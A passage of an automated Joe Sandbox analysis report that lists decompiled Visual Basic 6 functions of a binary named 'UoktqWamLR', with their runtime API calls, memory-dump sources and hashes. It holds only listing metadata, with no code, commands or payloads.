__vbaStrToUnicode.MSVBVM60(?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018), ref: 004FC430
__vbaFreeStr.MSVBVM60(?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018), ref: 004FC438
__vbaSetSystemError.MSVBVM60(?,00006610,00401006,00000000,004FB9CC,?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003), ref: 004FC452
__vbaAryLock.MSVBVM60(?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?,00401006,00000000,?,?,00000000,?,00000000), ref: 004FC460
__vbaSetSystemError.MSVBVM60(004FB9CC,00000000,00000001,00000000,?,?,?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?,00401006), ref: 004FC47F
__vbaAryUnlock.MSVBVM60(?,004FB9CC,00000000,00000001,00000000,?,?,?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?), ref: 004FC488
__vbaRedimPreserve.MSVBVM60(00000080,00000001,000000FF,00000011,00000001,?,00000000,?,004FB9CC,00000000,00000001,00000000,?,?,?,000000FF), ref: 004FC49F
__vbaFreeObj.MSVBVM60(004FC4DF,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC4D1
__vbaFreeStr.MSVBVM60(004FC4DF,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC4D9

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
String ID:
API String ID: 1703787653-0
Opcode ID: 53b1819d0daf4a6dea98ac09c1f07ea0d32592184725d96cba7041c397b738d9
Instruction ID: fe4f05bb9b394a2db23a9c91b1b7239e9f06f28171879672cc90585fd6296c92
Opcode Fuzzy Hash: 53b1819d0daf4a6dea98ac09c1f07ea0d32592184725d96cba7041c397b738d9
Instruction Fuzzy Hash: 77A11C71D4021DBADF14EBE5C986EEF7B7DEF08744F10412BF201B6192D67899048BA4

Function 004FACF6 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 004FAC80: __vbaRedim.MSVBVM60(00000080,00000001,00503210,00000011,00000001,0000003F,00000000), ref: 004FACC0

__vbaFreeVar.MSVBVM60(?), ref: 004FAD41
#644.MSVBVM60(00000000,?), ref: 004FAD47
__vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 004FAD54
__vbaStrCat.MSVBVM60(0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD67
__vbaStrMove.MSVBVM60(0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD71
__vbaStrCat.MSVBVM60(0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD7D
__vbaStrMove.MSVBVM60(0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD87
__vbaStrCat.MSVBVM60(0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD92
__vbaStrMove.MSVBVM60(0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD9C
__vbaI4Str.MSVBVM60(00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADA2
__vbaStrCat.MSVBVM60(0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADAE
__vbaStrMove.MSVBVM60(0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADB8
__vbaI4Str.MSVBVM60(00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADBE
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000), ref: 004FADCA
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000,00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000), ref: 004FADE1
__vbaAryLock.MSVBVM60(?,00000000,?), ref: 004FADF3
#644.MSVBVM60(?,?,00000000,?), ref: 004FAE02
__vbaAryUnlock.MSVBVM60(?,?,?,00000000,?), ref: 004FAE0D
__vbaSetSystemError.MSVBVM60(00000000,00000040,?,?,00000000,00000000,00000040,?,?,?,00000000,?), ref: 004FAE2A

Strings

0"P, xrefs: 004FAD17

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Move$ErrorSystem$#644Free$ListLockRedimUnlock
String ID: 0"P
API String ID: 1842092487-401812310
Opcode ID: 5ab3e4ee78c146433b897b9cb61ac562b7d911ef4f6963e78108b819a6993c1f
Instruction ID: e692b728713c86e643894548c8e8ec123637982edfcaaf1a233d7e848f328fa7
Opcode Fuzzy Hash: 5ab3e4ee78c146433b897b9cb61ac562b7d911ef4f6963e78108b819a6993c1f
Instruction Fuzzy Hash: E131ECB1D001186ACB05EBA5C846EEF767CEF19704B14412BF611B62A1DB7C99058BB9

Function 004FD499 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FD4E6
__vbaVarMove.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FD504
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD52D
__vbaVarCmpGt.MSVBVM60(?,005032C0,00000002,?), ref: 004FD568
__vbaVarOr.MSVBVM60(?,00000000,?,005032C0,00000002,?), ref: 004FD572
__vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD578
__vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD583
__vbaRedim.MSVBVM60(00000080,00000001,00503220,00000011,00000001,?,00000000,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD5A8
__vbaAryLock.MSVBVM60(?,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD5BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD5EA
__vbaAryUnlock.MSVBVM60(?), ref: 004FD5F3
__vbaVarMove.MSVBVM60(?,00008003,?), ref: 004FD615
__vbaFreeObj.MSVBVM60(004FD654,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD64E

Strings

#P, xrefs: 004FD4BB
2P, xrefs: 004FD596

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$CheckFreeHresultMove$AddrefBoolLockNullRedimUnlock
String ID: #P$ 2P
API String ID: 3528959866-2063345085
Opcode ID: 49f5fba25593cb0acfe93c30554703775e444846d4d88b77dc70e4809935b2dd
Instruction ID: 1bbc5ab86efad46ade1bb089d2f8663394e10a035afc9b0f337b20a49f65ce71
Opcode Fuzzy Hash: 49f5fba25593cb0acfe93c30554703775e444846d4d88b77dc70e4809935b2dd
Instruction Fuzzy Hash: 6B41D8B1D00218AFDB14EFA9CC85EDEBBBDFB08704F50451AF105BB291D77999058BA4

Function 004FE499 Relevance: 22.6, APIs: 15, Instructions: 140COMMON

Download Yara Rule

APIs

#648.MSVBVM60(?), ref: 004FE4FA
__vbaFreeVar.MSVBVM60(?), ref: 004FE505
__vbaStrCmp.MSVBVM60(0040BEA8,?,?), ref: 004FE514
#645.MSVBVM60(?,00000000,0040BEA8,?,?), ref: 004FE537
__vbaStrMove.MSVBVM60(?,00000000,0040BEA8,?,?), ref: 004FE541
__vbaStrCmp.MSVBVM60(0040BEA8,00000000,?,00000000,0040BEA8,?,?), ref: 004FE54C
__vbaFreeStr.MSVBVM60(0040BEA8,00000000,?,00000000,0040BEA8,?,?), ref: 004FE55D
__vbaFreeStr.MSVBVM60(004FE65F), ref: 004FE659

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$#645#648Move
String ID:
API String ID: 2957232524-0
Opcode ID: a7502cbc32c6a79cd6317df831b075d8a7f199f4c751809c12f771afed83068c
Instruction ID: 23e628260fb18d390f68e270c91f65b88435ab54121a8c4d2dc4c4a7f9ca9f62
Opcode Fuzzy Hash: a7502cbc32c6a79cd6317df831b075d8a7f199f4c751809c12f771afed83068c
Instruction Fuzzy Hash: 35512B71D01218AFCB00EFD6C941AEEBBB8AF18704F50412BF615BB2A1D7785A05CF99

Function 004FE686 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE6E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FE70D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000058), ref: 004FE730
__vbaObjSet.MSVBVM60(?,00000000), ref: 004FE743
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CCA4,000000E0), ref: 004FE769
__vbaStrI2.MSVBVM60(?), ref: 004FE771
__vbaStrMove.MSVBVM60(?), ref: 004FE77B
#690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 004FE78E
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 004FE79D
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 004FE7AC

Strings

Show Tips at Startup, xrefs: 004FE781
Options, xrefs: 004FE786

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$#690MoveNew2
String ID: Options$Show Tips at Startup
API String ID: 2513475975-2759323971
Opcode ID: 3bc3b852b7dfa3f6813dfd766fadbfd9fcebd51df7b21294debb407c5e773a88
Instruction ID: 8a94f54eaa591aeb037a0b52cb3b76dbf075d533dc688a2e57e8bf33735e65a4
Opcode Fuzzy Hash: 3bc3b852b7dfa3f6813dfd766fadbfd9fcebd51df7b21294debb407c5e773a88
Instruction Fuzzy Hash: 6C313F71940208BFDB00EF95CD86EEEBBB8AF18709F10417AF605F71E1D67899448BA4

Function 004FED58 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040CC40,?), ref: 004FEDAC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CC30,00000024), ref: 004FEDCC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004FEDE9
__vbaNew2.MSVBVM60(0040CC40,?,?,00000000), ref: 004FEDFB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC30,0000001C), ref: 004FEE2C
__vbaStrVarVal.MSVBVM60(?,?), ref: 004FEE3B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CE08,00000054), ref: 004FEE54
__vbaFreeStr.MSVBVM60 ref: 004FEE5C
__vbaFreeObj.MSVBVM60 ref: 004FEE64
__vbaFreeVar.MSVBVM60 ref: 004FEE6C

Strings

#P, xrefs: 004FED86, 004FED89, 004FEDDD
#P, xrefs: 004FED7A

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2
String ID: #P$#P
API String ID: 4034668929-643604421
Opcode ID: ad6a19147125da6a79a55770fbc7dcefec8657f31b3b42ad2c4b01f5ac509ab4
Instruction ID: 5af4ddff2a76c9196be9ace13cc238c468b16e20f714446619fca71fef557af4
Opcode Fuzzy Hash: ad6a19147125da6a79a55770fbc7dcefec8657f31b3b42ad2c4b01f5ac509ab4
Instruction Fuzzy Hash: 91313E71900209EBDB14AFA6C985EAFBBBCFF18705F10402FF615B71A1D77899048AA4

Function 004F9D43 Relevance: 19.6, APIs: 13, Instructions: 123COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(00000000,00503300,00004008), ref: 004F9D8F

Part of subcall function 004F9EF4: __vbaVarVargNofree.MSVBVM60 ref: 004F9F36
Part of subcall function 004F9EF4: __vbaLenVar.MSVBVM60(?,00000000), ref: 004F9F40
Part of subcall function 004F9EF4: __vbaVarMove.MSVBVM60(?,00000000), ref: 004F9F4A

__vbaVarSub.MSVBVM60(?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DCE
__vbaI4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DD4
__vbaRedim.MSVBVM60(00000080,00000001,00503218,00000011,00000001,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9DE8
__vbaFreeVar.MSVBVM60(00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DF3
__vbaStr2Vec.MSVBVM60(?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DFF
__vbaAryMove.MSVBVM60(?,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9E0C
__vbaVarSub.MSVBVM60(?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9E44
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E4A
__vbaFreeVar.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E54
__vbaVarCopy.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E8B
__vbaFreeStr.MSVBVM60(004F9ED7,00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?), ref: 004F9EC6
__vbaAryDestruct.MSVBVM60(00000000,?,004F9ED7,00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?), ref: 004F9ED1

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$CopyMove$DestructNofreeRedimStr2Varg
String ID:
API String ID: 303438936-0
Opcode ID: 4e5380356bfeeb3c971159fd50d9e8f42f2393d1b63b2634f44d0d9e2bc86935
Instruction ID: c39a5234130bc96bc66ac869b02215cd2b81ea9cfcb5dd8006d3c104e3b278b8
Opcode Fuzzy Hash: 4e5380356bfeeb3c971159fd50d9e8f42f2393d1b63b2634f44d0d9e2bc86935
Instruction Fuzzy Hash: B141C6B1C0025CAACB11EFE5C9859DEBBBCBB48704F20412FE615B7292D7785A05CFA4

Function 004FDB76 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(?,?,00000000), ref: 004FDBB9
__vbaLenVar.MSVBVM60(?,?,?,?,00000000), ref: 004FDBC6
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,00000000), ref: 004FDBCC
__vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDBFA
#631.MSVBVM60(00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC00
__vbaVarCat.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC1B
__vbaVarMove.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC25
__vbaFreeStr.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC2D
__vbaFreeVarList.MSVBVM60(00000002,?,00000008,?,?,?,00000000,?,?,?,?,00000000,?,?,?,?), ref: 004FDC3B
__vbaFreeVar.MSVBVM60(004FDC87,00000000,?,?,?,?,00000000), ref: 004FDC81

Strings

@#P, xrefs: 004FDB98

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$#631ListMove
String ID: @#P
API String ID: 1551574828-1511617095
Opcode ID: a9317fb0db360dc0b8a8a9f36d8d9ba5e34fcf096d05c5082b2716a1a26e784a
Instruction ID: f60660588a085a5caeefaff03f02179ed6989bd2b64e490b811c6095d12225c3
Opcode Fuzzy Hash: a9317fb0db360dc0b8a8a9f36d8d9ba5e34fcf096d05c5082b2716a1a26e784a
Instruction Fuzzy Hash: 942119B2C0024CAACB04EFE6C885ADEBBBCAF08704F10812BF615FB191EA785545CF54

Function 004FB424 Relevance: 18.1, APIs: 12, Instructions: 78COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004FB467
#526.MSVBVM60(?,00000104), ref: 004FB476
__vbaStrVarMove.MSVBVM60(?,?,00000104), ref: 004FB47F
__vbaStrMove.MSVBVM60(?,?,00000104), ref: 004FB489
__vbaFreeVar.MSVBVM60(?,?,00000104), ref: 004FB491

Part of subcall function 004FFB2A: __vbaVarVargNofree.MSVBVM60 ref: 004FFB60
Part of subcall function 004FFB2A: __vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
Part of subcall function 004FFB2A: #644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
Part of subcall function 004FFB2A: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B

__vbaSetSystemError.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4CE
#616.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4DB
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4E5
__vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4F4
__vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4FF
__vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB525
__vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB52D

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$CopyMove$#526#616#644ErrorNofreeSystemVarg
String ID:
API String ID: 1295617847-0
Opcode ID: cc0998b9db657e4b1e33251e6c76b87a9dd65f9d87d7b5b559844c1325e696f5
Instruction ID: 4b075d06cefa5015de2cea9b86b394a0e3bd998eb9dd3ac40033cb8f85621fee
Opcode Fuzzy Hash: cc0998b9db657e4b1e33251e6c76b87a9dd65f9d87d7b5b559844c1325e696f5
Instruction Fuzzy Hash: E331CD71D011089BCB15EFE6C9829EEBBB9EF18304F50413FE605B7291DB385A45CB99

Function 004FAE72 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60 ref: 004FAEB6
__vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FAEC0
#644.MSVBVM60(00000000,?,00000000), ref: 004FAEC6
__vbaSetSystemError.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEE3
__vbaFreeStr.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEEB
__vbaAryLock.MSVBVM60(?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF0E
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 004FAF2B
__vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004FAF34
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF3F

Strings

@"P, xrefs: 004FAE93

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$ErrorSystem$#644FreeLockNofreeUnlockVarg
String ID: @"P
API String ID: 1674366042-1124221702
Opcode ID: 9297d036060c78d04d4a8be4b36407a6eb36a4ff46a4b14be117996e5083b9b6
Instruction ID: 55e0d61b71a9d108b2d6ba83f28d853850005754b8c31afce63f7689023b8828
Opcode Fuzzy Hash: 9297d036060c78d04d4a8be4b36407a6eb36a4ff46a4b14be117996e5083b9b6
Instruction Fuzzy Hash: 212115B5901218ABCB14EFA5CD46E9EB7BCEF08714F10411AF504B7291C678AA008BA9

Function 004FE1A1 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00409A00,00503364), ref: 004FE1F7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C964,000002B0), ref: 004FE24B
__vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE262
__vbaNew2.MSVBVM60(00409A00,00503364), ref: 004FE27F
